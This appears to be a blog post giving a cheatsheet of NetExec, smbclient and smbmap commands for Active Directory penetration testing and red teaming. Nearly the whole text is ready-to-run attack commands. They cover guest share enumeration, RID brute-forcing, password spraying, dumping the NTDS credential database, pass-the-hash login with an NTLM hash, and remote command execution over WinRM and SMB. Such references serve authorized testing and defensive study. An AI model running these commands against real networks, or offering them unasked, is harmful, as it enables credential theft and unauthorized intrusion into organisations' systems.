Post

NetExec (NXC) Commands Cheatsheet for AD Pentesting and Red Teaming

NetExec (NXC) Commands Cheatsheet for AD Pentesting and Red Teaming

NetExec (NXC) Commands Cheatsheet

Introduction

This cheatsheet provides a collection of essential NetExec (nxc) commands for Active Directory penetration testing and red teaming engagements. NetExec is a powerful post-exploitation and enumeration tool that simplifies network service attacks across large environments. It supports multiple protocols, including SMB, LDAP, and WinRM, making it an invaluable resource for security professionals.

For more detailed information and advanced usage, visit the official NetExec wiki: NetExec Wiki.

NXC Commands

Enumeration

Generate Hosts File

1
nxc smb <host> --generate-hosts-file hosts

List Shares with Guest Access

1
nxc smb <host> -u a -p '' --shares

Enumerate Domain Users with RID Brute-Forcing

1
nxc smb <host> -u a -p '' --rid-brute

Extract Usernames from Output

1
cat tmp | cut -d '\\' -f2 | awk '{print $1}'

Search for Files on Readable Shares

1
nxc smb <host> -u a -p '' -M spider_plus

Download a Specific File from a Share

1
nxc smb <host> -u a -p '' --get-file '<file>' <output-file> --share <share>

Password Spraying

1
nxc smb <host> -u users.txt -p '<password>' --continue-on-success

LDAP Enumeration

List Domain Users

1
nxc ldap <host> -u <user> -p '<password>' --users

Get Only User Descriptions

1
nxc ldap <host> -u <user> -p '<password>' -M get-desc-users

SMB Access Verification

1
nxc smb <host> -u <user> -p '<password>'

WinRM Access Verification

1
nxc winrm <host> -u <user> -p '<password>'

Execute Commands over WinRM

1
nxc winrm <host> -u <user> -p '<password>' -X '<command>'

LDAP Group Membership Enumeration

1
nxc ldap <host> -u <user> -p '<password>' -M groupmembership -o USER='<user>'

Dumping NTDS using Backup Operators Module

1
nxc smb <host> -u <user> -p '<password>' -M backup_operator

Dumping NTDS using NTDSUTIL

1
nxc smb <host> -u administrator -H <NTLM-hash> -M ntdsutil

SMBClient Commands

List Available Shares

1
smbclient -L //<host> -U '<user>%<password>'

Connect to a Share

1
smbclient //<host>/<share> -U '<user>%<password>'

Download a File

1
get <file>

Upload a File

1
put <file>

List Files in a Directory

1
ls

SMBMap Commands

List Shares with Anonymous Access

1
smbmap -H <host>

Authenticate and List Shares

1
smbmap -H <host> -u '<user>' -p '<password>'

List Files in a Share

1
smbmap -H <host> -u '<user>' -p '<password>' -r '<share>'

Download a File

1
smbmap -H <host> -u '<user>' -p '<password>' -r '<share>' -A '<file>' -q

Upload a File

1
smbmap -H <host> -u '<user>' -p '<password>' -r '<share>' --upload '<local_file>' '<remote_path>'

Login with Dumped Administrator Hash

1
nxc smb <host> -u administrator -H <NTLM-hash>

Execute Commands as Administrator via SMB

1
nxc smb <host> -u administrator -H <NTLM-hash> -x '<command>'
This post is licensed under CC BY 4.0 by the author.